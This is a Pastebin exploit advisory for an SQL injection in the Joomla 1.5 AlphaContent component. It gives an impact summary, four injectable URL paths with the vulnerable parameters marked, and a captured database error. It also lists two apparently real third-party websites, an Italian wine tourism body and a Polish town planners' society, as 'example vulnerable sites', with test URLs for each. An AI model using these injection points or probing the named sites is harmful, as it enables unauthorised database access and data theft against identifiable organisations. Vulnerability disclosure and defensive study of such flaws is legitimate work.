Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ###################################################################
- # Exploit Title : Joomla 1.5.26 Com_AlphaContent Components 3.x SQL Injection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 24/08/2019
- # Vendor Homepage : bestofjoomla.com - joomla.org - pensieroliquido.com
- # Software Information Link : joomla.info.tr/alphacontent-400-joomla-15-native
- bestofjoomla.com/component/option,com_bestofresources/task,detail/Itemid,54/id,754/
- # Joomla Affected Version : Joomla 1.5.18 to 1.5.26 - 1.x
- # Software Affected Version : Com_AlphaContent 3.x - 3.00 - 4.x - 4.0.0
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ###################################################################
- # Impact :
- ***********
- Joomla 1.5.26 Com_AlphaContent Components 3.x is prone to an SQL-injection vulnerability
- because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
- Exploiting this issue could allow an attacker to compromise the application, access or
- modify data, or exploit latent vulnerabilities in the underlying database.
- A remote attacker can send a specially crafted request to the vulnerable application and
- execute arbitrary SQL commands in application`s database. Further exploitation of this
- vulnerability may result in unauthorized data manipulation.
- An attacker can exploit this issue using a browser or with any SQL Injector Tool.
- ###################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?option=com_alphacontent§ion=[ID-NUMBER]&Itemid=[ID-NUMBER]&lang=it&limitstart=[SQL Injection]
- /index.php?option=com_alphacontent§ion=weblinks&Itemid=[ID-NUMBER]&lang=de&limitstart=[SQL Injection]
- /index.php?option=com_alphacontent§ion=[ID-NUMBER]&Itemid=[ID-NUMBER]&lang=es&limitstart=[SQL Injection]
- index.php?option=com_alphacontent§ion=[ID-NUMBER]&cat=[ID-NUMBER]&task=view&id=[SQL Injection]
- ###################################################################
- # Example Vulnerable Sites :
- *************************
- Realizzazione Tom Agenzia di Comunicazione and Movimento Turismo del Vino Puglia
- is vulnerable to SQL Injection.
- [+] mtvpuglia.it/index.php?option=com_alphacontent§ion=2&Itemid=1&lang=it&limitstart=1%27
- Society of Polish Town Planners is vulnerable to SQL Injection
- [+] tup.org.pl/index.php?option=com_alphacontent§ion=37&Itemid=1&lang=en&limitstart=50%27
- ###################################################################
- # Example SQL Database Error :
- ****************************
- No valid database connection You have an error in your SQL syntax; check the manual
- that corresponds to your MariaDB server version for the right syntax to use near '' at
- line 1 SQL=SELECT id, title FROM jos_categories WHERE section='2' AND
- published='1' AND `access` <= 0 ORDER BY
- ###################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ###################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement